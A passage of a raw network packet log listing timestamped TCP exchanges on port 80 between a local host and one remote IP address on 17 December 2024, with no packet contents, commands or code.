Dec 17, 2024 06:03:31.213295937 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.213305950 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.213430882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.215220928 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.215353012 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.215363979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.215590000 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.217242956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.217349052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.217358112 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.217381001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.219254971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.219333887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.219392061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.219484091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.221329927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.221395016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.221481085 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.221546888 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.223305941 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.223380089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.223443031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.223565102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.225339890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.225461960 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.225461960 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.225521088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.227380037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.227442026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.227473021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.227554083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.229374886 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.229516983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.229652882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.229652882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.231396914 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.231523037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.231581926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.233472109 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.233537912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.233561039 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.233612061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.235445023 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.235532999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.235589027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.235810041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.237473965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.237536907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.237593889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.237652063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.239490986 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.239610910 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.239619970 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.239675999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.241517067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.241617918 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.241657972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.241724014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.243547916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.243659973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.243668079 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.243735075 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.245557070 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.245645046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.245687962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.245759964 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.247595072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.247765064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.247814894 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.247838020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.335091114 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.335133076 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.335309029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.335578918 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.335632086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.335700035 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.335791111 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.337383032 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.337505102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.337536097 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.337645054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.339206934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.339267015 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.339343071 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.339412928 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.341015100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.341070890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.341124058 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.341124058 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.342787981 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.342864990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.342907906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.342978954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.344564915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.344676018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.344717026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.345134020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.346241951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.346311092 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.346369982 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.346498013 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.347929001 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.347985983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.348047972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.348102093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.349648952 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.349742889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.349792957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.349855900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.351342916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.351422071 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.351452112 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.351726055 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.352946997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.353068113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.353120089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.353131056 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.354621887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.354700089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.354737043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.354794025 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.356159925 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.356230974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.356273890 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.356317997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.357788086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.357903957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.357990026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.357990026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.359361887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.359488010 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.359503031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.359694958 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.361063957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.361159086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.361222029 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.361422062 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.363125086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.363244057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.363289118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.363339901 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.364018917 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.364131927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.364150047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.364190102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.365518093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.365633011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.365778923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.365778923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.367041111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.367151976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.367254019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.367341995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.368539095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.368669033 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.369024038 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.369188070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.370007992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.370109081 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.370136976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.370204926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.371498108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.371629000 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.371680021 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.371746063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.372977972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.373032093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.373059988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.373085976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.374427080 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.374521017 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.374581099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.374710083 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.375895977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.376009941 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.376750946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.377321005 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.377469063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.378820896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.378983974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.380258083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.380338907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.381510973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.381747961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.381860018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.381870031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.381925106 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.383222103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.383275986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.383447886 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.383678913 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.384799004 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.384866953 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.384876013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.385365009 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.386136055 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.386195898 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.386229992 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.386300087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.387599945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.387646914 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.387698889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.389054060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.389139891 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.389162064 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.389216900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.390526056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.390597105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.390649080 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.390723944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.391973972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.392028093 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.392077923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.392121077 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.393465042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.393517971 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.393575907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.393627882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.394934893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.395008087 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.395041943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.395144939 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.396406889 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.396541119 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.396558046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.396590948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.397836924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.397958994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.397967100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.398066998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.399308920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.399365902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.399425983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.399498940 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.400784016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.400897026 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.400908947 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.400986910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.402245998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.402364016 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.402374983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.402406931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.403757095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.403868914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.403882980 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.403949976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.405189991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.405308962 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.405333042 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.405359983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.406672001 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.406775951 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.406785965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.406833887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.408124924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.408180952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.408247948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.408288956 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.409573078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.409651041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.409739017 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.409797907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.411031008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.411083937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.411156893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.411281109 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.412592888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.412666082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.412708044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.412846088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.413980961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.414087057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.414093018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.414175987 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.415432930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.415477991 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.527329922 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.527483940 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.527621984 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.527888060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.527925014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.528009892 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.529067039 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.529194117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.529239893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.529239893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.529241085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.529241085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.530232906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.530299902 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.530356884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.530478001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.531395912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.531502962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.531507015 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.532018900 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.532538891 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.532634974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.532661915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.533516884 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.533695936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.533732891 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.533781052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.533781052 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.534795046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.534869909 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.534904003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.535054922 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.537591934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.537672997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.537708998 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.537744045 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.537856102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.537857056 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.537925959 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.538089037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.538168907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.538252115 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.539213896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.539335966 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.539350986 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.539820910 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.540273905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.540332079 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.540407896 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.540407896 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.541390896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.541465998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.541493893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.541675091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.542473078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.542534113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.542577028 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.542597055 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.543566942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.543683052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.543828011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.543876886 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.544677973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.544739962 CET	80	49882	31.41.244.11	192.168.2.5
